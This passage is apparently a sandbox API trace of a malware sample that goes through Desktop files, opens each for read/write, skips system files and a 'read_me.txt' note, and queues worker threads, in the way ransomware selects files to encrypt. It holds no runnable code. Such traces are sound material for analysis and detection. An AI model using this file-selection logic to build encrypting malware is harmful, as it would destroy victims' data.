ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0xc337220, ftLastAccessTime.dwHighDateTime=0x1d4c5ce, ftLastWriteTime.dwLowDateTime=0xc337220, ftLastWriteTime.dwHighDateTime=0x1d4c5ce, nFileSizeHigh=0x0, nFileSizeLow=0x7eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aEefa7T.jpg", cAlternateFileName="")) returned 1 [0075.936] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEefa7T.jpg") returned 53 [0075.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEefa7T.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeefa7t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0075.936] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="read_me.txt") returned 0x0 [0075.936] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="autoexec.bat") returned 0x0 [0075.936] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="desktop.ini") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="autorun.inf") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="ntuser.dat") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="iconcache.db") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="bootsect.bak") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="boot.ini") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0075.937] StrStrW (lpFirst="aeefa7t.jpg", lpSrch="thumbs.db") returned 0x0 [0075.937] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 12 [0075.937] QueueUserWorkItem (Function=0x404e00, Context=0x7c4, Flags=0x0) returned 1 [0075.937] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982eb590, ftCreationTime.dwHighDateTime=0x1d4cbc9, ftLastAccessTime.dwLowDateTime=0xf9cfd370, ftLastAccessTime.dwHighDateTime=0x1d4cfc9, ftLastWriteTime.dwLowDateTime=0xf9cfd370, ftLastWriteTime.dwHighDateTime=0x1d4cfc9, nFileSizeHigh=0x0, nFileSizeLow=0x9c37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cKQ4LePz.wav", cAlternateFileName="")) returned 1 [0075.937] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cKQ4LePz.wav") returned 54 [0075.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cKQ4LePz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckq4lepz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="read_me.txt") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="autoexec.bat") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="desktop.ini") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="autorun.inf") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="ntuser.dat") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="iconcache.db") returned 0x0 [0075.937] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="bootsect.bak") returned 0x0 [0075.938] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="boot.ini") returned 0x0 [0075.938] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="ntuser.dat.log") returned 0x0 [0075.938] StrStrW (lpFirst="ckq4lepz.wav", lpSrch="thumbs.db") returned 0x0 [0075.938] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 13 [0075.938] QueueUserWorkItem (Function=0x404e00, Context=0x77c, Flags=0x0) returned 1 [0075.938] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4506b850, ftCreationTime.dwHighDateTime=0x1d4c7ea, ftLastAccessTime.dwLowDateTime=0xec4b9c20, ftLastAccessTime.dwHighDateTime=0x1d4cab0, ftLastWriteTime.dwLowDateTime=0xec4b9c20, ftLastWriteTime.dwHighDateTime=0x1d4cab0, nFileSizeHigh=0x0, nFileSizeLow=0x1a1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CQoYWdLDE8A.flv", cAlternateFileName="CQOYWD~1.FLV")) returned 1 [0075.938] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CQoYWdLDE8A.flv") returned 57 [0075.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CQoYWdLDE8A.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqoywdlde8a.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="read_me.txt") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="autoexec.bat") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="desktop.ini") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="autorun.inf") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="ntuser.dat") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="iconcache.db") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="bootsect.bak") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="boot.ini") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="ntuser.dat.log") returned 0x0 [0075.938] StrStrW (lpFirst="cqoywdlde8a.flv", lpSrch="thumbs.db") returned 0x0 [0075.938] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 14 [0075.938] QueueUserWorkItem (Function=0x404e00, Context=0x780, Flags=0x0) returned 1 [0075.938] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.939] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0075.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0075.939] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0075.939] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0075.939] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0075.939] CloseHandle (hObject=0x774) returned 1 [0075.939] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855b97b0, ftCreationTime.dwHighDateTime=0x1d4d19d, ftLastAccessTime.dwLowDateTime=0x7a095250, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x7a095250, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x13eb6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ebB_pHirOaSct0.swf", cAlternateFileName="EBB_PH~1.SWF")) returned 1 [0075.939] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebB_pHirOaSct0.swf") returned 60 [0075.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebB_pHirOaSct0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ebb_phiroasct0.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="read_me.txt") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="autoexec.bat") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="desktop.ini") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="autorun.inf") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="ntuser.dat") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="iconcache.db") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="bootsect.bak") returned 0x0 [0075.939] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="boot.ini") returned 0x0 [0075.940] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="ntuser.dat.log") returned 0x0 [0075.940] StrStrW (lpFirst="ebb_phiroasct0.swf", lpSrch="thumbs.db") returned 0x0 [0075.940] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 15 [0075.940] QueueUserWorkItem (Function=0x404e00, Context=0x774, Flags=0x0) returned 1 [0075.940] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ce201b0, ftCreationTime.dwHighDateTime=0x1d4d473, ftLastAccessTime.dwLowDateTime=0x616ca880, ftLastAccessTime.dwHighDateTime=0x1d4cbe4, ftLastWriteTime.dwLowDateTime=0x616ca880, ftLastWriteTime.dwHighDateTime=0x1d4cbe4, nFileSizeHigh=0x0, nFileSizeLow=0xb0ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F0klApUO2Z.odp", cAlternateFileName="F0KLAP~1.ODP")) returned 1 [0075.940] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F0klApUO2Z.odp") returned 56 [0075.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F0klApUO2Z.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f0klapuo2z.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c8 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="read_me.txt") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="autoexec.bat") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="desktop.ini") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="autorun.inf") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="ntuser.dat") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="iconcache.db") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="bootsect.bak") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="boot.ini") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="ntuser.dat.log") returned 0x0 [0075.940] StrStrW (lpFirst="f0klapuo2z.odp", lpSrch="thumbs.db") returned 0x0 [0075.940] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 16 [0075.940] QueueUserWorkItem (Function=0x404e00, Context=0x7c8, Flags=0x0) returned 1 [0075.940] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aace270, ftCreationTime.dwHighDateTime=0x1d4cdf4, ftLastAccessTime.dwLowDateTime=0x6722280, ftLastAccessTime.dwHighDateTime=0x1d4d2af, ftLastWriteTime.dwLowDateTime=0x6722280, ftLastWriteTime.dwHighDateTime=0x1d4d2af, nFileSizeHigh=0x0, nFileSizeLow=0xccd3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkzqpiiCf f.bmp", cAlternateFileName="GKZQPI~1.BMP")) returned 1 [0075.940] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gkzqpiiCf f.bmp") returned 57 [0075.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gkzqpiiCf f.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gkzqpiicf f.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x794 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="read_me.txt") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="autoexec.bat") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="desktop.ini") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="autorun.inf") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="ntuser.dat") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="iconcache.db") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="bootsect.bak") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="boot.ini") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0075.941] StrStrW (lpFirst="gkzqpiicf f.bmp", lpSrch="thumbs.db") returned 0x0 [0075.941] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 17 [0075.941] QueueUserWorkItem (Function=0x404e00, Context=0x794, Flags=0x0) returned 1 [0075.941] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811a0, ftCreationTime.dwHighDateTime=0x1d4d4cd, ftLastAccessTime.dwLowDateTime=0x4a2c98d0, ftLastAccessTime.dwHighDateTime=0x1d4cc00, ftLastWriteTime.dwLowDateTime=0x4a2c98d0, ftLastWriteTime.dwHighDateTime=0x1d4cc00, nFileSizeHigh=0x0, nFileSizeLow=0xde73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h-5QryXhtlv.jpg", cAlternateFileName="H-5QRY~1.JPG")) returned 1 [0075.941] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-5QryXhtlv.jpg") returned 57 [0075.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-5QryXhtlv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-5qryxhtlv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x790 [0075.941] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="read_me.txt") returned 0x0 [0075.941] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="autoexec.bat") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="desktop.ini") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="autorun.inf") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="ntuser.dat") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="iconcache.db") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="bootsect.bak") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="boot.ini") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0075.942] StrStrW (lpFirst="h-5qryxhtlv.jpg", lpSrch="thumbs.db") returned 0x0 [0075.942] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 18 [0075.942] QueueUserWorkItem (Function=0x404e00, Context=0x790, Flags=0x0) returned 1 [0075.942] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ffb9c0, ftCreationTime.dwHighDateTime=0x1d4d390, ftLastAccessTime.dwLowDateTime=0x66e781a0, ftLastAccessTime.dwHighDateTime=0x1d4d00c, ftLastWriteTime.dwLowDateTime=0x66e781a0, ftLastWriteTime.dwHighDateTime=0x1d4d00c, nFileSizeHigh=0x0, nFileSizeLow=0xe4c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LBVX9 jMA_nh7r1-t.mp3", cAlternateFileName="LBVX9J~1.MP3")) returned 1 [0075.942] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LBVX9 jMA_nh7r1-t.mp3") returned 63 [0075.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LBVX9 jMA_nh7r1-t.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lbvx9 jma_nh7r1-t.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x784 [0075.942] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="read_me.txt") returned 0x0 [0075.942] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="autoexec.bat") returned 0x0 [0075.942] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="desktop.ini") returned 0x0 [0075.942] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="autorun.inf") returned 0x0 [0075.942] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="ntuser.dat") returned 0x0 [0075.943] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="iconcache.db") returned 0x0 [0075.943] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="bootsect.bak") returned 0x0 [0075.943] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="boot.ini") returned 0x0 [0075.943] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0075.943] StrStrW (lpFirst="lbvx9 jma_nh7r1-t.mp3", lpSrch="thumbs.db") returned 0x0 [0075.943] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 19 [0075.943] QueueUserWorkItem (Function=0x404e00, Context=0x784, Flags=0x0) returned 1 [0075.943] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b991d60, ftCreationTime.dwHighDateTime=0x1d4cd89, ftLastAccessTime.dwLowDateTime=0x71256b00, ftLastAccessTime.dwHighDateTime=0x1d4c855, ftLastWriteTime.dwLowDateTime=0x71256b00, ftLastWriteTime.dwHighDateTime=0x1d4c855, nFileSizeHigh=0x0, nFileSizeLow=0x14f31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lu8 o.swf", cAlternateFileName="LU8O~1.SWF")) returned 1 [0075.943] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lu8 o.swf") returned 51 [0075.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lu8 o.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lu8 o.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x798 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="read_me.txt") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="autoexec.bat") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="desktop.ini") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="autorun.inf") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="ntuser.dat") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="iconcache.db") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="bootsect.bak") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="boot.ini") returned 0x0 [0075.943] StrStrW (lpFirst="lu8 o.swf", lpSrch="ntuser.dat.log") returned 0x0 [0075.944] StrStrW (lpFirst="lu8 o.swf", lpSrch="thumbs.db") returned 0x0 [0075.944] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 20 [0075.944] QueueUserWorkItem (Function=0x404e00, Context=0x798, Flags=0x0) returned 1 [0075.944] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdb600, ftCreationTime.dwHighDateTime=0x1d4c708, ftLastAccessTime.dwLowDateTime=0x8c817450, ftLastAccessTime.dwHighDateTime=0x1d4cae6, ftLastWriteTime.dwLowDateTime=0x8c817450, ftLastWriteTime.dwHighDateTime=0x1d4cae6, nFileSizeHigh=0x0, nFileSizeLow=0x64d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ob 7JY7fuAZ.flv", cAlternateFileName="OB7JY7~1.FLV")) returned 1 [0075.944] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ob 7JY7fuAZ.flv") returned 57 [0075.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ob 7JY7fuAZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob 7jy7fuaz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7cc [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="read_me.txt") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="autoexec.bat") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="desktop.ini") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="autorun.inf") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="ntuser.dat") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="iconcache.db") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="bootsect.bak") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="boot.ini") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="ntuser.dat.log") returned 0x0 [0075.944] StrStrW (lpFirst="ob 7jy7fuaz.flv", lpSrch="thumbs.db") returned 0x0 [0075.944] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 21 [0075.944] QueueUserWorkItem (Function=0x404e00, Context=0x7cc, Flags=0x0) returned 1 [0075.944] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23636730, ftCreationTime.dwHighDateTime=0x1d4c75d, ftLastAccessTime.dwLowDateTime=0x403ad320, ftLastAccessTime.dwHighDateTime=0x1d4c64f, ftLastWriteTime.dwLowDateTime=0x403ad320, ftLastWriteTime.dwHighDateTime=0x1d4c64f, nFileSizeHigh=0x0, nFileSizeLow=0x15284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6r6WVfc_j6IN62 yp.gif", cAlternateFileName="P6R6WV~1.GIF")) returned 1 [0075.944] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P6r6WVfc_j6IN62 yp.gif") returned 64 [0075.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P6r6WVfc_j6IN62 yp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6r6wvfc_j6in62 yp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="read_me.txt") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="autoexec.bat") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="desktop.ini") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="autorun.inf") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="ntuser.dat") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="iconcache.db") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="bootsect.bak") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="boot.ini") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="ntuser.dat.log") returned 0x0 [0075.945] StrStrW (lpFirst="p6r6wvfc_j6in62 yp.gif", lpSrch="thumbs.db") returned 0x0 [0075.945] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 22 